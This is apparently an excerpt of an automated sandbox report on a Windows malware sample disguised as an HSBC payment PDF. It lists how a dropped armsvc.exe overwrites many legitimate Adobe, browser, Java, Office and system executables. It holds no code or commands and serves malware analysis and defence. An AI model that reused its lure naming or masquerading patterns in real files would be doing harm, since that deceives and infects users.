              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\wbem\WmiApSrv.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\vds.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | System file written: C:\Windows\System32\alg.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\7-Zip\7zFM.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\snmptrap.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\Spectrum.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\Locator.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\7-Zip\7z.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | System file written: C:\Windows\System32\AppVClient.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\SysWOW64\perfhost.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\7-Zip\7zG.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\msiexec.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\VSSVC.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\wbengine.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\SearchIndexer.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\TieringEngineService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\AgentService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\FXSSVC.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\SensorDataService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\msdtc.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: \hsbc payment notification scan copy ref 62587299-24_pdf.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\vds.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\snmptrap.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\Spectrum.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Windows Media Player\wmpnetwk.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\Locator.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\7-Zip\7z.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Windows\System32\AppVClient.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
